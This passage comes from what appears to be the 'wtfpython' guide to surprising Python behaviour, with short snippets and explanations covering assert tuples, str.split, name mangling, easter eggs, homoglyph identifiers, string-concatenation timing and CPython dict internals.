Not asserting strongly enough ```py a = "python" b = "javascript" ``` **Output:** ```py # An assert statement with an assertion failure message. >>> assert(a == b, "Both languages are different") # No AssertionError is raised ``` 5\. ```py some_list = [1, 2, 3] some_dict = { "key_1": 1, "key_2": 2, "key_3": 3 } some_list = some_list.append(4) some_dict = some_dict.update({"key_4": 4}) ``` **Output:** ```py >>> print(some_list) None >>> print(some_dict) None ``` 6\. ```py def some_recursive_func(a): if a[0] == 0: return a[0] -= 1 some_recursive_func(a) return a def similar_recursive_func(a): if a == 0: return a a -= 1 similar_recursive_func(a) return a ``` **Output:** ```py >>> some_recursive_func([5, 0]) [0, 0] >>> similar_recursive_func(5) 4 ``` #### 💡 Explanation: * For 1, the correct statement for expected behavior is `x, y = (0, 1) if True else (None, None)`. * For 2, the correct statement for expected behavior is `t = ('one',)` or `t = 'one',` (missing comma) otherwise the interpreter considers `t` to be a `str` and iterates over it character by character. * `()` is a special token and denotes empty `tuple`. * In 3, as you might have already figured out, there's a missing comma after 5th element (`"that"`) in the list. So by implicit string literal concatenation, ```py >>> ten_words_list ['some', 'very', 'big', 'list', 'thatconsists', 'of', 'exactly', 'ten', 'words'] ``` * No `AssertionError` was raised in 4th snippet because instead of asserting the individual expression `a == b`, we're asserting entire tuple. The following snippet will clear things up, ```py >>> a = "python" >>> b = "javascript" >>> assert a == b Traceback (most recent call last): File "<stdin>", line 1, in <module> AssertionError >>> assert (a == b, "Values are not equal") <stdin>:1: SyntaxWarning: assertion is always true, perhaps remove parentheses? >>> assert a == b, "Values are not equal" Traceback (most recent call last): File "<stdin>", line 1, in <module> AssertionError: Values are not equal ``` * As for the fifth snippet, most methods that modify the items of sequence/mapping objects like `list.append`, `dict.update`, `list.sort`, etc. modify the objects in-place and return `None`. The rationale behind this is to improve performance by avoiding making a copy of the object if the operation can be done in-place (Referred from [here](https://docs.python.org/3/faq/design.html#why-doesn-t-list-sort-return-the-sorted-list)). * Last one should be fairly obvious, mutable object (like `list`) can be altered in the function, and the reassignment of an immutable (`a -= 1`) is not an alteration of the value. * Being aware of these nitpicks can save you hours of debugging effort in the long run. --- ### ▶ Splitsies * <!-- Example ID: ec3168ba-a81a-4482-afb0-691f1cc8d65a ---> ```py >>> 'a'.split() ['a'] # is same as >>> 'a'.split(' ') ['a'] # but >>> len(''.split()) 0 # isn't the same as >>> len(''.split(' ')) 1 ``` #### 💡 Explanation: - It might appear at first that the default separator for split is a single space `' '`, but as per the [docs](https://docs.python.org/3/library/stdtypes.html#str.split) > If sep is not specified or is `None`, a different splitting algorithm is applied: runs of consecutive whitespace are regarded as a single separator, and the result will contain no empty strings at the start or end if the string has leading or trailing whitespace. Consequently, splitting an empty string or a string consisting of just whitespace with a None separator returns `[]`. 
> If sep is given, consecutive delimiters are not grouped together and are deemed to delimit empty strings (for example, `'1,,2'.split(',')` returns `['1', '', '2']`). Splitting an empty string with a specified separator returns `['']`. - Noticing how the leading and trailing whitespaces are handled in the following snippet will make things clear, ```py >>> ' a '.split(' ') ['', 'a', ''] >>> ' a '.split() ['a'] >>> ''.split(' ') [''] ``` --- ### ▶ Wild imports * <!-- Example ID: 83deb561-bd55-4461-bb5e-77dd7f411e1c ---> <!-- read-only --> ```py # File: module.py def some_weird_name_func_(): print("works!") def _another_weird_name_func(): print("works!") ``` **Output** ```py >>> from module import * >>> some_weird_name_func_() "works!" >>> _another_weird_name_func() Traceback (most recent call last): File "<stdin>", line 1, in <module> NameError: name '_another_weird_name_func' is not defined ``` #### 💡 Explanation: - It is often advisable to not use wildcard imports. The first obvious reason for this is, in wildcard imports, the names with a leading underscore don't get imported. This may lead to errors during runtime. - Had we used `from ... import a, b, c` syntax, the above `NameError` wouldn't have occurred. ```py >>> from module import some_weird_name_func_, _another_weird_name_func >>> _another_weird_name_func() works! ``` - If you really want to use wildcard imports, then you'd have to define the list `__all__` in your module that will contain a list of public objects that'll be available when we do wildcard imports. ```py __all__ = ['_another_weird_name_func'] def some_weird_name_func_(): print("works!") def _another_weird_name_func(): print("works!") ``` **Output** ```py >>> _another_weird_name_func() "works!" >>> some_weird_name_func_() Traceback (most recent call last): File "<stdin>", line 1, in <module> NameError: name 'some_weird_name_func_' is not defined ``` --- ### ▶ All sorted? * <!-- Example ID: e5ff1eaf-8823-4738-b4ce-b73f7c9d5511 --> ```py >>> x = 7, 8, 9 >>> sorted(x) == x False >>> sorted(x) == sorted(x) True >>> y = reversed(x) >>> sorted(y) == sorted(y) False ``` #### 💡 Explanation: - The `sorted` method always returns a list, and comparing lists and tuples always returns `False` in Python. - ```py >>> [] == tuple() False >>> x = 7, 8, 9 >>> type(x), type(sorted(x)) (tuple, list) ``` - Unlike `sorted`, the `reversed` method returns an iterator. Why? Because sorting requires the iterator to be either modified in-place or use an extra container (a list), whereas reversing can simply work by iterating from the last index to the first. - So during comparison `sorted(y) == sorted(y)`, the first call to `sorted()` will consume the iterator `y`, and the next call will just return an empty list. ```py >>> x = 7, 8, 9 >>> y = reversed(x) >>> sorted(y), sorted(y) ([7, 8, 9], []) ``` --- ### ▶ Midnight time doesn't exist? <!-- Example ID: 1bce8294-5619-4d70-8ce3-fe0bade690d1 ---> ```py from datetime import datetime midnight = datetime(2018, 1, 1, 0, 0) midnight_time = midnight.time() noon = datetime(2018, 1, 1, 12, 0) noon_time = noon.time() if midnight_time: print("Time at midnight is", midnight_time) if noon_time: print("Time at noon is", noon_time) ``` **Output (< 3.5):** ```py ('Time at noon is', datetime.time(12, 0)) ``` The midnight time is not printed. #### 💡 Explanation: Before Python 3.5, the boolean value for `datetime.time` object was considered to be `False` if it represented midnight in UTC. 
It is error-prone when using the `if obj:` syntax to check if the `obj` is null or some equivalent of "empty." --- --- ## Section: The Hidden treasures! This section contains a few lesser-known and interesting things about Python that most beginners like me are unaware of (well, not anymore). ### ▶ Okay Python, Can you make me fly? <!-- Example ID: a92f3645-1899-4d50-9721-0031be4aec3f ---> Well, here you go ```py import antigravity ``` **Output:** Sshh... It's a super-secret. #### 💡 Explanation: + `antigravity` module is one of the few easter eggs released by Python developers. + `import antigravity` opens up a web browser pointing to the [classic XKCD comic](https://xkcd.com/353/) about Python. + Well, there's more to it. There's **another easter egg inside the easter egg**. If you look at the [code](https://github.com/python/cpython/blob/master/Lib/antigravity.py#L7-L17), there's a function defined that purports to implement the [XKCD's geohashing algorithm](https://xkcd.com/426/). --- ### ▶ `goto`, but why? <!-- Example ID: 2aff961e-7fa5-4986-a18a-9e5894bd89fe ---> ```py from goto import goto, label for i in range(9): for j in range(9): for k in range(9): print("I am trapped, please rescue!") if k == 2: goto .breakout # breaking out from a deeply nested loop label .breakout print("Freedom!") ``` **Output (Python 2.3):** ```py I am trapped, please rescue! I am trapped, please rescue! Freedom! ``` #### 💡 Explanation: - A working version of `goto` in Python was [announced](https://mail.python.org/pipermail/python-announce-list/2004-April/002982.html) as an April Fool's joke on 1st April 2004. - Current versions of Python do not have this module. - Although it works, but please don't use it. Here's the [reason](https://docs.python.org/3/faq/design.html#why-is-there-no-goto) to why `goto` is not present in Python. --- ### ▶ Brace yourself! <!-- Example ID: 5c0c75f2-ddd9-4da3-ba49-c4be7ec39acf ---> If you are one of the people who doesn't like using whitespace in Python to denote scopes, you can use the C-style {} by importing, ```py from __future__ import braces ``` **Output:** ```py File "some_file.py", line 1 from __future__ import braces SyntaxError: not a chance ``` Braces? No way! If you think that's disappointing, use Java. Okay, another surprising thing, can you find where's the `SyntaxError` raised in `__future__` module [code](https://github.com/python/cpython/blob/master/Lib/__future__.py)? #### 💡 Explanation: + The `__future__` module is normally used to provide features from future versions of Python. The "future" in this specific context is however, ironic. + This is an easter egg concerned with the community's feelings on this issue. + The code is actually present [here](https://github.com/python/cpython/blob/025eb98dc0c1dc27404df6c544fc2944e0fa9f3a/Python/future.c#L49) in `future.c` file. + When the CPython compiler encounters a [future statement](https://docs.python.org/3.3/reference/simple_stmts.html#future-statements), it first runs the appropriate code in `future.c` before treating it as a normal import statement. --- ### ▶ Let's meet Friendly Language Uncle For Life <!-- Example ID: 6427fae6-e959-462d-85da-ce4c94ce41be ---> **Output (Python 3.x)** ```py >>> from __future__ import barry_as_FLUFL >>> "Ruby" != "Python" # there's no doubt about it File "some_file.py", line 1 "Ruby" != "Python" ^ SyntaxError: invalid syntax >>> "Ruby" <> "Python" True ``` There we go. 
#### 💡 Explanation: - This is relevant to [PEP-401](https://www.python.org/dev/peps/pep-0401/) released on April 1, 2009 (now you know, what it means). - Quoting from the PEP-401 > Recognized that the != inequality operator in Python 3.0 was a horrible, finger-pain inducing mistake, the FLUFL reinstates the <> diamond operator as the sole spelling. - There were more things that Uncle Barry had to share in the PEP; you can read them [here](https://www.python.org/dev/peps/pep-0401/). - It works well in an interactive environment, but it will raise a `SyntaxError` when you run via python file (see this [issue](https://github.com/satwikkansal/wtfpython/issues/94)). However, you can wrap the statement inside an `eval` or `compile` to get it working, ```py from __future__ import barry_as_FLUFL print(eval('"Ruby" <> "Python"')) ``` --- ### ▶ Even Python understands that love is complicated <!-- Example ID: b93cad9e-d341-45d1-999c-fcdce65bed25 ---> ```py import this ``` Wait, what's **this**? `this` is love :heart: **Output:** ``` The Zen of Python, by Tim Peters Beautiful is better than ugly. Explicit is better than implicit. Simple is better than complex. Complex is better than complicated. Flat is better than nested. Sparse is better than dense. Readability counts. Special cases aren't special enough to break the rules. Although practicality beats purity. Errors should never pass silently. Unless explicitly silenced. In the face of ambiguity, refuse the temptation to guess. There should be one-- and preferably only one --obvious way to do it. Although that way may not be obvious at first unless you're Dutch. Now is better than never. Although never is often better than *right* now. If the implementation is hard to explain, it's a bad idea. If the implementation is easy to explain, it may be a good idea. Namespaces are one honking great idea -- let's do more of those! ``` It's the Zen of Python! ```py >>> love = this >>> this is love True >>> love is True False >>> love is False False >>> love is not True or False True >>> love is not True or False; love is love # Love is complicated True ``` #### 💡 Explanation: * `this` module in Python is an easter egg for The Zen Of Python ([PEP 20](https://www.python.org/dev/peps/pep-0020)). * And if you think that's already interesting enough, check out the implementation of [this.py](https://hg.python.org/cpython/file/c3896275c0f6/Lib/this.py). Interestingly, **the code for the Zen violates itself** (and that's probably the only place where this happens). * Regarding the statement `love is not True or False; love is love`, ironic but it's self-explanatory (if not, please see the examples related to `is` and `is not` operators). --- ### ▶ Yes, it exists! <!-- Example ID: 4286db3d-1ea7-47c9-8fb6-a9a04cac6e49 ---> **The `else` clause for loops.** One typical example might be: ```py def does_exists_num(l, to_find): for num in l: if num == to_find: print("Exists!") break else: print("Does not exist") ``` **Output:** ```py >>> some_list = [1, 2, 3, 4, 5] >>> does_exists_num(some_list, 4) Exists! >>> does_exists_num(some_list, -1) Does not exist ``` **The `else` clause in exception handling.** An example, ```py try: pass except: print("Exception occurred!!!") else: print("Try block executed successfully...") ``` **Output:** ```py Try block executed successfully... ``` #### 💡 Explanation: - The `else` clause after a loop is executed only when there's no explicit `break` after all the iterations. You can think of it as a "nobreak" clause. 
- The `else` clause after a `try` block is also called the "completion clause", as reaching the `else` clause in a `try` statement means that the try block actually completed successfully.

---

### ▶ Ellipsis *
<!-- Example ID: 969b7100-ab3d-4a7d-ad7d-a6be16181b2b --->
```py
def some_func():
    Ellipsis
```

**Output**
```py
>>> some_func()
# No output, No Error

>>> SomeRandomString
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
NameError: name 'SomeRandomString' is not defined

>>> Ellipsis
Ellipsis
```

#### 💡 Explanation
- In Python, `Ellipsis` is a globally available built-in object which is equivalent to `...`.
    ```py
    >>> ...
    Ellipsis
    ```
- Ellipsis can be used for several purposes,
    + As a placeholder for code that hasn't been written yet (just like the `pass` statement)
    + In slicing syntax, to represent full slices in the remaining directions
    ```py
    >>> import numpy as np
    >>> three_dimensional_array = np.arange(8).reshape(2, 2, 2)
    >>> three_dimensional_array
    array([
        [
            [0, 1],
            [2, 3]
        ],

        [
            [4, 5],
            [6, 7]
        ]
    ])
    ```
    So our `three_dimensional_array` is an array of arrays of arrays. Let's say we want to print the second element (index `1`) of all the innermost arrays; we can use Ellipsis to bypass all the preceding dimensions
    ```py
    >>> three_dimensional_array[:,:,1]
    array([[1, 3],
       [5, 7]])
    >>> three_dimensional_array[..., 1]  # using Ellipsis.
    array([[1, 3],
       [5, 7]])
    ```
    Note: this will work for any number of dimensions. You can even select a slice in the first and last dimensions and ignore the middle ones this way (`n_dimensional_array[first_dim_slice, ..., last_dim_slice]`)
    + In [type hinting](https://docs.python.org/3/library/typing.html) to indicate only a part of the type (like `Callable[..., int]` or `Tuple[str, ...]`)
    + You may also use Ellipsis as a default function argument (in the cases when you want to differentiate between the "no argument passed" and "None value passed" scenarios).

---

### ▶ Inpinity
<!-- Example ID: ff473ea8-a3b1-4876-a6f0-4378aff790c1 --->
The spelling is intended. Please, don't submit a patch for this.

**Output (Python 3.x):**
```py
>>> infinity = float('infinity')
>>> hash(infinity)
314159
>>> hash(float('-inf'))
-314159
```

#### 💡 Explanation:
- The hash of infinity is 10⁵ x π.
- Interestingly, the hash of `float('-inf')` is "-10⁵ x π" in Python 3, whereas "-10⁵ x e" in Python 2.

---

### ▶ Let's mangle
<!-- Example ID: 37146d2d-9e67-43a9-8729-3c17934b910c --->
1\.

```py
class Yo(object):
    def __init__(self):
        self.__honey = True
        self.bro = True
```

**Output:**
```py
>>> Yo().bro
True
>>> Yo().__honey
AttributeError: 'Yo' object has no attribute '__honey'
>>> Yo()._Yo__honey
True
```

2\.

```py
class Yo(object):
    def __init__(self):
        # Let's try something symmetrical this time
        self.__honey__ = True
        self.bro = True
```

**Output:**
```py
>>> Yo().bro
True

>>> Yo()._Yo__honey__
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'Yo' object has no attribute '_Yo__honey__'
```

Why did `Yo()._Yo__honey` work?

3\.

```py
_A__variable = "Some value"

class A(object):
    def some_func(self):
        return __variable  # not initialized anywhere yet
```

**Output:**
```py
>>> A().__variable
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'A' object has no attribute '__variable'

>>> A().some_func()
'Some value'
```

#### 💡 Explanation:

* [Name Mangling](https://en.wikipedia.org/wiki/Name_mangling) is used to avoid naming collisions between different namespaces.
* In Python, the interpreter modifies (mangles) the class member names starting with `__` (double underscore a.k.a "dunder") and not ending with more than one trailing underscore by adding `_NameOfTheClass` in front. * So, to access `__honey` attribute in the first snippet, we had to append `_Yo` to the front, which would prevent conflicts with the same name attribute defined in any other class. * But then why didn't it work in the second snippet? Because name mangling excludes the names ending with double underscores. * The third snippet was also a consequence of name mangling. The name `__variable` in the statement `return __variable` was mangled to `_A__variable`, which also happens to be the name of the variable we declared in the outer scope. * Also, if the mangled name is longer than 255 characters, truncation will happen. --- --- ## Section: Appearances are deceptive! ### ▶ Skipping lines? <!-- Example ID: d50bbde1-fb9d-4735-9633-3444b9d2f417 ---> **Output:** ```py >>> value = 11 >>> valuе = 32 >>> value 11 ``` Wut? **Note:** The easiest way to reproduce this is to simply copy the statements from the above snippet and paste them into your file/shell. #### 💡 Explanation Some non-Western characters look identical to letters in the English alphabet but are considered distinct by the interpreter. ```py >>> ord('е') # cyrillic 'e' (Ye) 1077 >>> ord('e') # latin 'e', as used in English and typed using standard keyboard 101 >>> 'е' == 'e' False >>> value = 42 # latin e >>> valuе = 23 # cyrillic 'e', Python 2.x interpreter would raise a `SyntaxError` here >>> value 42 ``` The built-in `ord()` function returns a character's Unicode [code point](https://en.wikipedia.org/wiki/Code_point), and different code positions of Cyrillic 'e' and Latin 'e' justify the behavior of the above example. --- ### ▶ Teleportation <!-- Example ID: edafe923-0c20-4315-b6e1-0c31abfc38f5 ---> ```py # `pip install numpy` first. import numpy as np def energy_send(x): # Initializing a numpy array np.array([float(x)]) def energy_receive(): # Return an empty numpy array return np.empty((), dtype=np.float).tolist() ``` **Output:** ```py >>> energy_send(123.456) >>> energy_receive() 123.456 ``` Where's the Nobel Prize? #### 💡 Explanation: * Notice that the numpy array created in the `energy_send` function is not returned, so that memory space is free to reallocate. * `numpy.empty()` returns the next free memory slot without reinitializing it. This memory spot just happens to be the same one that was just freed (usually, but not always). --- ### ▶ Well, something is fishy... <!-- Example ID: cb6a37c5-74f7-44ca-b58c-3b902419b362 ---> ```py def square(x): """ A simple function to calculate the square of a number by addition. """ sum_so_far = 0 for counter in range(x): sum_so_far = sum_so_far + x return sum_so_far ``` **Output (Python 2.x):** ```py >>> square(10) 10 ``` Shouldn't that be 100? **Note:** If you're not able to reproduce this, try running the file [mixed_tabs_and_spaces.py](/mixed_tabs_and_spaces.py) via the shell. #### 💡 Explanation * **Don't mix tabs and spaces!** The character just preceding return is a "tab", and the code is indented by multiple of "4 spaces" elsewhere in the example. * This is how Python handles tabs: > First, tabs are replaced (from left to right) by one to eight spaces such that the total number of characters up to and including the replacement is a multiple of eight <...> * So the "tab" at the last line of `square` function is replaced with eight spaces, and it gets into the loop. 
* Python 3 is kind enough to throw an error for such cases automatically.

    **Output (Python 3.x):**
    ```py
    TabError: inconsistent use of tabs and spaces in indentation
    ```

---

---

## Section: Miscellaneous


### ▶ `+=` is faster
<!-- Example ID: bfd19c60-a807-4a26-9598-4912b86ddb36 --->
```py
# using "+", three strings:
>>> timeit.timeit("s1 = s1 + s2 + s3", setup="s1 = ' ' * 100000; s2 = ' ' * 100000; s3 = ' ' * 100000", number=100)
0.25748300552368164
# using "+=", three strings:
>>> timeit.timeit("s1 += s2 + s3", setup="s1 = ' ' * 100000; s2 = ' ' * 100000; s3 = ' ' * 100000", number=100)
0.012188911437988281
```

#### 💡 Explanation:
+ `+=` is faster than `+` for concatenating more than two strings because the first string (for example, `s1` in `s1 += s2 + s3`) is not destroyed while calculating the complete string.

---

### ▶ Let's make a giant string!
<!-- Example ID: c7a07424-63fe-4504-9842-8f3d334f28fc --->
```py
def add_string_with_plus(iters):
    s = ""
    for i in range(iters):
        s += "xyz"
    assert len(s) == 3*iters

def add_bytes_with_plus(iters):
    s = b""
    for i in range(iters):
        s += b"xyz"
    assert len(s) == 3*iters

def add_string_with_format(iters):
    fs = "{}"*iters
    s = fs.format(*(["xyz"]*iters))
    assert len(s) == 3*iters

def add_string_with_join(iters):
    l = []
    for i in range(iters):
        l.append("xyz")
    s = "".join(l)
    assert len(s) == 3*iters

def convert_list_to_string(l, iters):
    s = "".join(l)
    assert len(s) == 3*iters
```

**Output:**

```py
# Executed in ipython shell using %timeit for better readability of results.
# You can also use the timeit module in a normal Python shell/script, example usage below
# timeit.timeit('add_string_with_plus(10000)', number=1000, globals=globals())

>>> NUM_ITERS = 1000
>>> %timeit -n1000 add_string_with_plus(NUM_ITERS)
124 µs ± 4.73 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)
>>> %timeit -n1000 add_bytes_with_plus(NUM_ITERS)
211 µs ± 10.5 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)
>>> %timeit -n1000 add_string_with_format(NUM_ITERS)
61 µs ± 2.18 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)
>>> %timeit -n1000 add_string_with_join(NUM_ITERS)
117 µs ± 3.21 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)
>>> l = ["xyz"]*NUM_ITERS
>>> %timeit -n1000 convert_list_to_string(l, NUM_ITERS)
10.1 µs ± 1.06 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)
```

Let's increase the number of iterations by a factor of 10.

```py
>>> NUM_ITERS = 10000
>>> %timeit -n1000 add_string_with_plus(NUM_ITERS)  # Linear increase in execution time
1.26 ms ± 76.8 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)
>>> %timeit -n1000 add_bytes_with_plus(NUM_ITERS)  # Quadratic increase
6.82 ms ± 134 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)
>>> %timeit -n1000 add_string_with_format(NUM_ITERS)  # Linear increase
645 µs ± 24.5 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)
>>> %timeit -n1000 add_string_with_join(NUM_ITERS)  # Linear increase
1.17 ms ± 7.25 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)
>>> l = ["xyz"]*NUM_ITERS
>>> %timeit -n1000 convert_list_to_string(l, NUM_ITERS)  # Linear increase
86.3 µs ± 2 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)
```

#### 💡 Explanation
- You can read more about [timeit](https://docs.python.org/3/library/timeit.html) or [%timeit](https://ipython.org/ipython-doc/dev/interactive/magics.html#magic-timeit) on these links. They are used to measure the execution time of code pieces.
- Don't use `+` for generating long strings. In Python, `str` is immutable, so the left and right strings have to be copied into the new string for every pair of concatenations. If you concatenate four strings of length 10, you'll be copying (10+10) + ((10+10)+10) + (((10+10)+10)+10) = 90 characters instead of just 40 characters. Things get quadratically worse as the number and size of the strings increase (justified with the execution times of the `add_bytes_with_plus` function).
- Therefore, it's advised to use `.format()` or `%` syntax (however, they are slightly slower than `+` for very short strings).
- Or better, if you already have the contents available in the form of an iterable object, use `''.join(iterable_object)`, which is much faster.
- Unlike `add_bytes_with_plus`, `add_string_with_plus` didn't show a quadratic increase in execution time because of the `+=` optimizations discussed in the previous example. Had the statement been `s = s + "x" + "y" + "z"` instead of `s += "xyz"`, the increase would have been quadratic.
  ```py
  def add_string_with_plus(iters):
      s = ""
      for i in range(iters):
          s = s + "x" + "y" + "z"
      assert len(s) == 3*iters

  >>> %timeit -n100 add_string_with_plus(1000)
  388 µs ± 22.4 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)
  >>> %timeit -n100 add_string_with_plus(10000)  # Quadratic increase in execution time
  9 ms ± 298 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)
  ```
- So many ways to format and create a giant string are somewhat in contrast to the [Zen of Python](https://www.python.org/dev/peps/pep-0020/), according to which,

    > There should be one-- and preferably only one --obvious way to do it.

---

### ▶ Slowing down `dict` lookups *
<!-- Example ID: c9c26ce6-df0c-47f7-af0b-966b9386d4c3 --->
```py
some_dict = {str(i): 1 for i in range(1_000_000)}
another_dict = {str(i): 1 for i in range(1_000_000)}
```

**Output:**
```py
>>> %timeit some_dict['5']
28.6 ns ± 0.115 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each)
>>> some_dict[1] = 1
>>> %timeit some_dict['5']
37.2 ns ± 0.265 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each)

>>> %timeit another_dict['5']
28.5 ns ± 0.142 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each)
>>> another_dict[1]  # Trying to access a key that doesn't exist
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
KeyError: 1
>>> %timeit another_dict['5']
38.5 ns ± 0.0913 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each)
```

Why are the same lookups becoming slower?

#### 💡 Explanation:
+ CPython has a generic dictionary lookup function that handles all types of keys (`str`, `int`, any object ...), and a specialized one for the common case of dictionaries composed of `str`-only keys.
+ The specialized function (named `lookdict_unicode` in CPython's [source](https://github.com/python/cpython/blob/522691c46e2ae51faaad5bbbce7d959dd61770df/Objects/dictobject.c#L841)) knows all existing keys (including the looked-up key) are strings, and uses the faster & simpler string comparison to compare keys, instead of calling the `__eq__` method.
+ The first time a `dict` instance is accessed with a non-`str` key, it's modified so future lookups use the generic function.
+ This process is not reversible for the particular `dict` instance, and the key doesn't even have to exist in the dictionary. That's why attempting a failed lookup has the same effect.
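
A rough way to reproduce this outside IPython with the standard `timeit` module (absolute numbers are machine- and version-dependent, and the whole effect is a CPython implementation detail):

```py
import timeit

setup = "d = {str(i): 1 for i in range(1_000_000)}"

# Lookup while the dict still has str-only keys
fast = timeit.timeit("d['5']", setup=setup, number=1_000_000)

# Same lookup after a single failed access with a non-str key
poisoned = setup + "\ntry:\n    d[1]\nexcept KeyError:\n    pass"
slow = timeit.timeit("d['5']", setup=poisoned, number=1_000_000)

print(f"str-only keys   : {fast:.3f} s")
print(f"after int lookup: {slow:.3f} s")
```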
---

### ▶ Bloating instance `dict`s *
<!-- Example ID: fe706ab4-1615-c0ba-a078-76c98cbe3f48 --->
```py
import sys

class SomeClass:
    def __init__(self):
        self.some_attr1 = 1
        self.some_attr2 = 2
        self.some_attr3 = 3
        self.some_attr4 = 4


def dict_size(o):
    return sys.getsizeof(o.__dict__)
```

**Output:** (Python 3.8, other Python 3 versions may vary a little)
```py
>>> o1 = SomeClass()
>>> o2 = SomeClass()
>>> dict_size(o1)
104
>>> dict_size(o2)
104
>>> del o1.some_attr1
>>> o3 = SomeClass()
>>> dict_size(o3)
232
>>> dict_size(o1)
232
```

Let's try again... In a new interpreter:

```py
>>> o1 = SomeClass()
>>> o2 = SomeClass()
>>> dict_size(o1)
104  # as expected
>>> o1.some_attr5 = 5
>>> o1.some_attr6 = 6
>>> dict_size(o1)
360
>>> dict_size(o2)
272
>>> o3 = SomeClass()
>>> dict_size(o3)
232
```

What makes those dictionaries become bloated? And why are newly created objects bloated as well?

#### 💡 Explanation:
+ CPython is able to reuse the same "keys" object in multiple dictionaries. This was added in [PEP 412](https://www.python.org/dev/peps/pep-0412/) with the motivation to reduce memory usage, specifically in dictionaries of instances, where keys (instance attributes) tend to be common to all instances.
+ This optimization is entirely seamless for instance dictionaries, but it is disabled if certain assumptions are broken.
+ Key-sharing dictionaries do not support deletion; if an instance attribute is deleted, the dictionary is "unshared", and key-sharing is disabled for all future instances of the same class.
+ Additionally, if the dictionary keys have been resized (because new keys are inserted), they are kept shared *only* if they are used by exactly one dictionary (this allows adding many attributes in the `__init__` of the very first created instance, without causing an "unshare"). If multiple instances exist when a resize happens, key-sharing is disabled for all future instances of the same class: CPython can't tell whether your instances are using the same set of attributes anymore, and decides to bail out on attempting to share their keys.
+ A small tip, if you aim to lower your program's memory footprint: don't delete instance attributes, and make sure to initialize all attributes in your `__init__`!

---

### ▶ Minor Ones *
<!-- Example ID: f885cb82-f1e4-4daa-9ff3-972b14cb1324 --->
* `join()` is a string operation instead of a list operation. (sort of counter-intuitive at first usage)

  **💡 Explanation:** If `join()` is a method on a string, then it can operate on any iterable (list, tuple, iterators). If it were a method on a list, it'd have to be implemented separately by every type. Also, it doesn't make much sense to put a string-specific method on a generic `list` object API.

* A few weird-looking but semantically correct statements:
  + `[] = ()` is a semantically correct statement (unpacking an empty `tuple` into an empty `list`)
  + `'a'[0][0][0][0][0]` is also semantically correct, because Python doesn't have a character data type like other languages branched from C. So selecting a single character from a string returns a single-character string.
  + `3 --0-- 5 == 8` and `--5 == 5` are both semantically correct statements and evaluate to `True`.

* Given that `a` is a number, `++a` and `--a` are both valid Python statements but don't behave the same way as compared with similar statements in languages like C, C++, or Java.
  ```py
  >>> a = 5
  >>> a
  5
  >>> ++a
  5
  >>> --a
  5
  ```

  **💡 Explanation:**
  + There is no `++` operator in Python grammar. It is actually two `+` operators.
  + `++a` parses as `+(+a)`, which translates to `a`. Similarly, the output of the statement `--a` can be justified.
  + This StackOverflow [thread](https://stackoverflow.com/questions/3654830/why-are-there-no-and-operators-in-python) discusses the rationale behind the absence of increment and decrement operators in Python.

* You might be aware of the Walrus operator in Python. But have you ever heard about *the space-invader operator*?
  ```py
  >>> a = 42
  >>> a -=- 1
  >>> a
  43
  ```
  It is used as an alternative increment operator, together with another one:
  ```py
  >>> a +=+ 1
  >>> a
  44
  ```
  **💡 Explanation:** This prank comes from [Raymond Hettinger's tweet](https://twitter.com/raymondh/status/1131103570856632321?lang=en). The space-invader operator is actually just a malformatted `a -= (-1)`, which is equivalent to `a = a - (-1)`. Similarly for the `a += (+ 1)` case.

* Python has an undocumented [converse implication](https://en.wikipedia.org/wiki/Converse_implication) operator.
  ```py
  >>> False ** False == True
  True
  >>> False ** True == False
  True
  >>> True ** False == True
  True
  >>> True ** True == True
  True
  ```
  **💡 Explanation:** If you replace `False` and `True` with 0 and 1 and do the maths, the truth table is equivalent to a converse implication operator. ([Source](https://github.com/cosmologicon/pywat/blob/master/explanation.md#the-undocumented-converse-implication-operator))

* Since we are talking about operators, there's also the `@` operator for matrix multiplication (don't worry, this time it's for real).
  ```py
  >>> import numpy as np
  >>> np.array([2, 2, 2]) @ np.array([7, 8, 8])
  46
  ```
  **💡 Explanation:** The `@` operator was added in Python 3.5 keeping the scientific community in mind. Any object can overload the `__matmul__` magic method to define behavior for this operator.

* From Python 3.8 onwards you can use a typical f-string syntax like `f'{some_var=}'` for quick debugging. Example,
  ```py
  >>> some_string = "wtfpython"
  >>> f'{some_string=}'
  "some_string='wtfpython'"
  ```

* Python uses 2 bytes for local variable storage in functions. In theory, this means that only 65536 variables can be defined in a function. However, Python has a handy solution built in that can be used to store more than 2^16 variable names. The following code demonstrates what happens in the stack when more than 65536 local variables are defined (Warning: This code prints around 2^18 lines of text, so be prepared!):
  ```py
  import dis
  exec("""
  def f():
      """ + """
      """.join(["X" + str(x) + "=" + str(x) for x in range(65539)]))

  f()

  print(dis.dis(f))
  ```

* Multiple Python threads won't run your *Python code* concurrently (yes, you heard it right!). It may seem intuitive to spawn several threads and let them execute your Python code concurrently, but, because of the [Global Interpreter Lock](https://wiki.python.org/moin/GlobalInterpreterLock) in Python, all you're doing is making your threads execute on the same core turn by turn. Python threads are good for IO-bound tasks, but to achieve actual parallelization in Python for CPU-bound tasks, you might want to use the Python [multiprocessing](https://docs.python.org/3/library/multiprocessing.html) module.

* Sometimes, the `print` function might not print values immediately. For example,

  ```py
  # File some_file.py
  import time

  print("wtfpython", end="_")
  time.sleep(3)
  ```

  This will print `wtfpython` after 3 seconds because of the `end` argument: the output buffer is flushed only after encountering `\n` or when the program finishes execution. We can force the buffer to flush by passing the `flush=True` argument.
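  As a quick illustration, here's a minimal tweak of the snippet above (assuming Python 3.3+, where `print` accepts the `flush` keyword):

  ```py
  # File some_file.py
  import time

  print("wtfpython", end="_", flush=True)  # appears immediately now
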